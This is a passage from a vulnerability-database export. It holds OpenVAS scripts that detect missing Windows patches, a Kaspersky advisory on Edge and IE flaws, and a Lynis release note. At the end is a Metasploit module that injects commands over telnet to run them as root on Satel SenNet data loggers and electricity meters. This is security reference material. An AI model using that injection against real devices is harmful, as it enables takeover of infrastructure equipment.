Multiple Vulnerabilities (KB4041690)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4041690\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - A spoofing vulnerability in the Windows implementation of wireless networking (KRACK)\n\n - An error in USBHUB.SYS randomly causes memory corruption that results in\n random system crashes that are extremely difficult to diagnose.\n\n - Security updates to Microsoft Windows Search Component, Windows kernel-mode drivers,\n Microsoft Graphics Component, Internet Explorer, Windows kernel, Windows Wireless\n Networking, Windows Storage and File systems, Microsoft Windows DNS, Microsoft JET\n Database Engine, and the Windows SMB Server.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in the security context of the local system to take\n complete control of an affected system, gain access to potentially sensitive\n information, conduct a denial-of-service condition, bypass certain security\n restrictions and gain elevated privileges.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2012\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4041690\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2012:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"shell32.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.2.9200.22281\"))\n{\n report = 'File checked: ' + sysPath + \"\\shell32.dll\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 6.2.9200.22281\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:49", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4041681", "modified": "2019-05-03T00:00:00", "published": "2017-10-11T00:00:00", "id": "OPENVAS:1361412562310812016", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812016", "title": "Microsoft Windows Multiple Vulnerabilities (KB4041681)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4041681)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812016\");\n script_version(\"2019-05-03T10:54:50+0000\");\n script_cve_id(\"CVE-2017-11762\", \"CVE-2017-8694\", \"CVE-2017-8717\", \"CVE-2017-8718\",\n \"CVE-2017-11763\", \"CVE-2017-11765\", \"CVE-2017-8727\", \"CVE-2017-11771\",\n \"CVE-2017-11772\", \"CVE-2017-11780\", \"CVE-2017-11781\", \"CVE-2017-11784\",\n \"CVE-2017-11785\", \"CVE-2017-11790\", \"CVE-2017-11793\", \"CVE-2017-11810\",\n \"CVE-2017-11813\", \"CVE-2017-11814\", \"CVE-2017-11815\", \"CVE-2017-11816\",\n \"CVE-2017-11817\", \"CVE-2017-11819\", \"CVE-2017-11822\", \"CVE-2017-11824\",\n \"CVE-2017-8689\", \"CVE-2017-13080\");\n script_bugtraq_id(101108, 101100, 101161, 101162, 101109, 101111, 101142, 101114,\n 101116, 101110, 101140, 101147, 101149, 101077, 101141, 101081,\n 101083, 101093, 101136, 101094, 101095, 101121, 101122, 101099,\n 101128, 101274);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 10:54:50 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-10-11 08:41:12 +0530 (Wed, 11 Oct 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4041681)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4041681\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - A spoofing vulnerability in the Windows implementation of wireless networking (KRACK)\n\n - An error in the Microsoft Server Block Message (SMB) when an attacker sends\n specially crafted requests to the server.\n\n - An error in the Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space Layout Randomization\n (ASLR) bypass.\n\n - An error when the Windows kernel improperly handles objects in memory.\n\n - An error when the Windows font library improperly handles specially crafted\n embedded fonts.\n\n - An error when the Windows kernel-mode driver fails to properly handle objects\n in memory.\n\n - An error when Internet Explorer improperly accesses objects in memory.\n\n - An error in the Microsoft JET Database Engine that could allow remote code\n execution on an affected system.\n\n - An error when Internet Explorer improperly handles objects in memory.\n\n - An error when the Windows Graphics Component improperly handles objects in\n memory.\n\n - An error in the way that the scripting engine handles objects in memory in\n Internet Explorer.\n\n - An error when Internet Explorer improperly accesses objects in memory via the\n Microsoft Windows Text Services Framework.\n\n - An error when Windows Search improperly handles objects in memory.\n\n - An error in the way that Microsoft browsers access objects in memory.\n\n - An error when the Windows kernel improperly initializes objects in memory.\n\n - An error in the way that the Windows Graphics Device Interface (GDI) handles\n objects in memory, allowing an attacker to retrieve information from a targeted\n system.\n\n - An error in the way that the Windows SMB Server handles certain requests.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, conduct denial-of-service, gain access to potentially\n sensitive information, take control of the affected system and gain escalated\n privileges.\");\n\n script_tag(name:\"affected\", value:\"Windows 7 for 32-bit/x64 Systems Service Pack 1\n\n Windows Server 2008 R2 for x64-based Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4041681\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"win32k.sys\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.1.7601.23914\"))\n{\n report = 'File checked: ' + sysPath + \"\\win32k.sys\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 6.1.7601.23914\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:50", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4041693", "modified": "2019-05-03T00:00:00", "published": "2017-10-11T00:00:00", "id": "OPENVAS:1361412562310812022", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812022", "title": "Microsoft Windows Multiple Vulnerabilities (KB4041693)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4041693)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812022\");\n script_version(\"2019-05-03T10:54:50+0000\");\n script_cve_id(\"CVE-2017-11762\", \"CVE-2017-8694\", \"CVE-2017-8717\", \"CVE-2017-8718\",\n \"CVE-2017-11763\", \"CVE-2017-11765\", \"CVE-2017-8727\", \"CVE-2017-11771\",\n \"CVE-2017-11772\", \"CVE-2017-11779\", \"CVE-2017-11780\", \"CVE-2017-11781\",\n \"CVE-2017-11783\", \"CVE-2017-11784\", \"CVE-2017-11785\", \"CVE-2017-11790\",\n \"CVE-2017-11793\", \"CVE-2017-11810\", \"CVE-2017-11813\", \"CVE-2017-11814\",\n \"CVE-2017-11815\", \"CVE-2017-11816\", \"CVE-2017-11817\", \"CVE-2017-11818\",\n \"CVE-2017-11822\", \"CVE-2017-11824\", \"CVE-2017-8689\", \"CVE-2017-13080\");\n script_bugtraq_id(101108, 101100, 101161, 101162, 101109, 101111, 101142, 101114,\n 101116, 101166, 101110, 101140, 101144, 101147, 101149, 101077,\n 101141, 101081, 101083, 101093, 101136, 101094, 101095, 101101,\n 101122, 101099, 101128, 101274);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 10:54:50 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-10-11 09:41:11 +0530 (Wed, 11 Oct 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4041693)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4041693\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - A spoofing vulnerability in the Windows implementation of wireless networking (KRACK)\n\n - An error when Windows improperly handles calls to Advanced Local Procedure\n Call (ALPC).\n\n - An error in the Microsoft Server Block Message (SMB) when an attacker sends\n specially crafted requests to the server.\n\n - An error in the Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space Layout Randomization\n (ASLR) bypass.\n\n - An error in certain Trusted Platform Module (TPM) chipsets.\n\n - An error when the Windows kernel improperly handles objects in memory.\n\n - An error when the Windows font library improperly handles specially crafted\n embedded fonts.\n\n - An error when the Windows kernel-mode driver fails to properly handle objects\n in memory.\n\n - An error when Internet Explorer improperly accesses objects in memory.\n\n - An error in the Microsoft JET Database Engine that could allow remote code\n execution on an affected system.\n\n - An error when the Windows Graphics Component improperly handles objects in\n memory.\n\n - An error in the way that the scripting engine handles objects in memory in\n Internet Explorer.\n\n - An error when Internet Explorer improperly accesses objects in memory via\n the Microsoft Windows Text Services Framework.\n\n - An error in Windows Domain Name System (DNS) DNSAPI.\n\n - An error when Windows Search improperly handles objects in memory.\n\n - An error when Windows Search handles objects in memory.\n\n - An error in Microsoft Windows storage when it fails to validate an\n integrity-level check.\n\n - An error in the way that the Windows Graphics Device Interface (GDI) handles\n objects in memory, allowing an attacker to retrieve information from a targeted\n system.\n\n - An error in the way that the Windows SMB Server handles certain requests.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n who successfully exploited this vulnerability to run arbitrary code in the\n security context of the local system, cause the affected system to crash, gain\n access to potentially sensitive information, take control of an affected system\n and gain the same user rights as the current user.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 8.1 for 32-bit/x64\n\n Microsoft Windows Server 2012 R2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4041693\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"gdi32.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.3.9600.18818\"))\n{\n report = 'File checked: ' + sysPath + \"\\gdi32.dll\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 6.3.9600.18818\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2019-03-21T00:15:30", "bulletinFamily": "info", "description": "### *Detect date*:\n10/10/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Edge and Microsoft Internet Explorer. Malicious users can exploit these vulnerabilities to obtain sensitive information, execute arbitrary code.\n\n### *Affected products*:\nMicrosoft Edge \nMicrosoft Internet Explorer versions 9 through 11\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-11790](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11790>) \n[CVE-2017-11792](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11792>) \n[CVE-2017-11793](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11793>) \n[CVE-2017-11794](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11794>) \n[CVE-2017-11796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11796>) \n[CVE-2017-11798](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11798>) \n[CVE-2017-11813](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11813>) \n[CVE-2017-11812](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11812>) \n[CVE-2017-11811](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11811>) \n[CVE-2017-11810](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11810>) \n[CVE-2017-11810](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11810>) \n[CVE-2017-11811](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11811>) \n[CVE-2017-11812](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11812>) \n[CVE-2017-11813](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11813>) \n[CVE-2017-11790](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11790>) \n[CVE-2017-11792](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11792>) \n[CVE-2017-11793](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11793>) \n[CVE-2017-11794](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11794>) \n[CVE-2017-11796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11796>) \n[CVE-2017-11798](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11798>) \n[CVE-2017-11800](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11800>) \n[CVE-2017-11805](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11805>) \n[CVE-2017-11808](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11808>) \n[CVE-2017-11804](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11804>) \n[CVE-2017-11809](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11809>) \n[CVE-2017-11799](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11799>) \n[CVE-2017-11822](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11822>) \n[CVE-2017-11806](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11806>) \n[CVE-2017-11802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11802>) \n[CVE-2017-11807](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11807>) \n[CVE-2017-8726](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8726>) \n[CVE-2017-11821](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11821>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2017-11810](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11810>)7.6Critical \n[CVE-2017-11811](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11811>)7.5Critical \n[CVE-2017-11812](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11812>)7.5Critical \n[CVE-2017-11813](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11813>)7.6Critical \n[CVE-2017-11790](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11790>)4.3Critical \n[CVE-2017-11792](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11792>)7.5Critical \n[CVE-2017-11793](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11793>)7.6Critical \n[CVE-2017-11794](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11794>)4.3Critical \n[CVE-2017-11796](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11796>)7.5Critical \n[CVE-2017-11798](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11798>)7.6Critical \n[CVE-2017-11800](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11800>)7.6Critical \n[CVE-2017-11805](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11805>)7.5Critical \n[CVE-2017-11808](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11808>)7.5Critical \n[CVE-2017-11804](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11804>)7.5Critical \n[CVE-2017-11809](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11809>)7.5Critical \n[CVE-2017-11799](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11799>)7.5Critical \n[CVE-2017-11822](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11822>)7.6Critical \n[CVE-2017-11806](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11806>)7.5Critical \n[CVE-2017-11802](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11802>)7.5Critical \n[CVE-2017-11807](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11807>)7.5Critical \n[CVE-2017-8726](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8726>)4.3Critical \n[CVE-2017-11821](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11821>)7.5Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4041689](<http://support.microsoft.com/kb/4041689>) \n[4041693](<http://support.microsoft.com/kb/4041693>) \n[4041676](<http://support.microsoft.com/kb/4041676>) \n[4041690](<http://support.microsoft.com/kb/4041690>) \n[4041681](<http://support.microsoft.com/kb/4041681>) \n[4041691](<http://support.microsoft.com/kb/4041691>) \n[4042895](<http://support.microsoft.com/kb/4042895>) \n[4040685](<http://support.microsoft.com/kb/4040685>)", "modified": "2019-03-07T00:00:00", "published": "2017-10-10T00:00:00", "id": "KLA11112", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11112", "title": "\r KLA11112Multiple vulnerabilities in Microsoft Edge and Microsoft Internet Explorer ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "kitploit": [{"lastseen": "2019-10-18T12:34:09", "bulletinFamily": "tools", "description": "[  ](<https://4.bp.blogspot.com/-p2rdZ63sxRU/VbBxt5iYZuI/AAAAAAAAEac/8yjkIc_IDdU/s1600/lynis2.1.1.png>)\n\n \n\n\nWe are excited to announce this major release of auditing tool Lynis. Several big changes have been made to core functions of Lynis. These changes are the next of simplification improvements we made. There is a risk of breaking your existing configuration. \n \nLynis is an open source security auditing tool. Used by system administrators, security professionals, and auditors, to evaluate the security defenses of their Linux and UNIX-based systems. It runs on the host itself, so it performs more extensive security scans than vulnerability scanners. \n\n \n\n\n** Supported operating systems **\n\n \n\n\nThe tool has almost no dependencies, therefore it runs on almost all Unix based systems and versions, including: \n\n * AIX \n * FreeBSD \n * HP-UX \n * Linux \n * Mac OS \n * NetBSD \n * OpenBSD \n * Solaris \n * and others \n\nIt even runs on systems like the Raspberry Pi and several storage devices! \n \n\n\n** Installation optional ** \n \nLynis is light-weight and easy to use. Installation is optional: just copy it to a system, and use \"./lynis audit system\" to start the security scan. It is written in shell script and released as open source software ( GPL ). \n\n \n\n\n** How it works **\n\n \n\n\nLynis performs hundreds of individual tests, to determine the security state of the system. The security scan itself consists of performing a set of steps, from initialization the program, up to the report. \n\n \n\n\n** Steps **\n\n 1. Determine operating system \n 2. Search for available tools and utilities \n 3. Check for Lynis update \n 4. Run tests from enabled plugins \n 5. Run security tests per category \n 6. Report status of security scan \n\nBesides the data displayed on screen, all technical details about the scan are stored in a log file. Any findings (warnings, suggestions, data collection) are stored in a report file. \n\n \n\n\n** Opportunistic scanning **\n\n \n\n\nLynis scanning is opportunistic: it uses what it can find. \n\nFor example if it sees you are running Apache, it will perform an initial round of Apache related tests. When during the Apache scan it also discovers a SSL/TLS configuration, it will perform additional auditing steps on that. While doing that, it then will collect discovered certificates, so they can be scanned later as well. \n\n \n\n\n** In-depth security scans **\n\n \n\n\nBy performing opportunistic scanning, the tool can run with almost no dependencies. The more it finds, the deeper the audit will be. In other words, Lynis will always perform scans which are customized to your system. No audit will be the same! \n\n \n\n\n** Use cases **\n\n \n\n\nSince Lynis is flexible, it is used for several different purposes. Typical use cases for Lynis include: \n\n * Security auditing \n * Compliance testing (e.g. PCI, HIPAA, SOx) \n * Vulnerability detection and scanning \n * System hardening \n\n \n\n\n** Resources used for testing **\n\n \n\n\nMany other tools use the same data files for performing tests. Since Lynis is not limited to a few common Linux distributions, it uses tests from standards and many custom ones not found in any other tool. \n\n * Best practices \n * CIS \n * NIST \n * NSA \n * OpenSCAP data \n * Vendor guides and recommendations (e.g. Debian Gentoo, Red Hat) \n\n \n\n\n** Lynis Plugins ** \n \nlugins enable the tool to perform additional tests. They can be seen as an extension (or add-on) to Lynis, enhancing its functionality. One example is the compliance checking plugin, which performs specific tests only applicable to some standard. \n \n** Changelog **\n\nUpgrade note \n\n \n \n During the development of this release, the project got informed about a flaw\n that possibly could be abused by a local attacker. Even with the small risk of\n success, upgrading is highly recommended. See details on\n [CVE-2017-8108](https://cisofy.com/security/cve/cve-2017-8108/)\n \n This release is a special maintenance release with focus on cleaning up the code\n for readability and future expansion.\n \n Changes:\n --------\n * Use ROOTDIR variable instead of fixed paths\n * Introduction of IsEmpty and HasData functions for readability of code\n * Renamed some variables to better indicate their purpose (counting, data type)\n * Removal of unused code and comments\n * Deleted unused tests from database file\n * Correct levels of identation\n * Support for older mac OS X versions (Lion and Mountain Lion)\n * Initialized variables for more binaries\n * Additional sysctls are tested\n \n Tests:\n ------\n * MALW-3280 - Extended test with Symantec components\n * PKGS-7332 - Detection of macOS ports tool and installed packages\n * TOOL-5120 - Snort detection\n * TOOL-5122 - Snort configuration file\n\n \n \n\n\n** [ Download Lynis 2.5.0 ](<https://cisofy.com/download/lynis/>) **\n *[\n GPL\n ]: GNU Public License\n", "modified": "2017-05-05T14:35:12", "published": "2017-05-05T14:35:12", "id": "KITPLOIT:8819491108895473634", "href": "http://www.kitploit.com/2017/05/lynis-250-security-auditing-tool-for.html", "title": "Lynis 2.5.0 - Security Auditing Tool for Unix/Linux Systems", "type": "kitploit", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2019-11-22T20:27:55", "bulletinFamily": "exploit", "description": "This module exploits an OS Command Injection vulnerability in Satel Iberia SenNet Data Loggers & Electricity Meters to perform arbitrary command execution as 'root'.\n", "modified": "2017-07-24T13:26:21", "published": "2017-04-06T20:52:11", "id": "MSF:AUXILIARY/SCANNER/TELNET/SATEL_CMD_EXEC", "href": "", "type": "metasploit", "title": "Satel Iberia SenNet Data Logger and Electricity Meters Command Injection Vulnerability", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Telnet\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Satel Iberia SenNet Data Logger and Electricity Meters Command Injection Vulnerability',\n 'Description' => %q{\n This module exploits an OS Command Injection vulnerability in Satel Iberia SenNet Data Loggers & Electricity Meters\n to perform arbitrary command execution as 'root'.\n },\n 'References' =>\n [\n [ 'CVE', '2017-6048' ],\n [ 'URL', 'https://ipositivesecurity.com/2017/04/07/sennet-data-logger-appliances-and-electricity-meters-multiple-vulnerabilties/' ],\n [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-131-02' ]\n ],\n 'Author' =>\n [\n 'Karn Ganeshen <KarnGaneshen[at]gmail.com>'\n ],\n 'DisclosureDate' => 'Apr 07, 2017',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'VERBOSE' => true })\n )\n\n register_options(\n [\n Opt::RPORT(5000),\n OptInt.new('TIMEOUT', [true, 'Timeout for the Telnet probe', 30]),\n OptString.new('CMD', [true, 'Command(s) to run', 'id'])\n ], self.class\n )\n\n deregister_options('USERNAME', 'PASSWORD')\n end\n\n def run_host(ip)\n to = (datastore['TIMEOUT'].zero?) ? 30 : datastore['TIMEOUT']\n begin\n ::Timeout.timeout(to) do\n command = datastore['CMD']\n inject = \"$true; #{command}\"\n res = connect\n\n print_status(\"Sending command now - #{command}\")\n\n sock.puts(inject)\n data = sock.get_once(-1, to)\n print_good(\"#{data}\")\n\n loot_name = 'cmd-exec-log'\n loot_type = 'text/plain'\n loot_desc = 'Satel SenNet CMD Exec Dump'\n p = store_loot(loot_name, loot_type, datastore['RHOST'], data, loot_desc)\n print_good(\"File saved in: #{p}\")\n end\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError\n print_error(\"#{rhost}:#{rport} - Connection Failed...\")\n return false\n ensure\n disconnect\n end\n end\nend\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/telnet/satel_cmd_exec.rb"}]}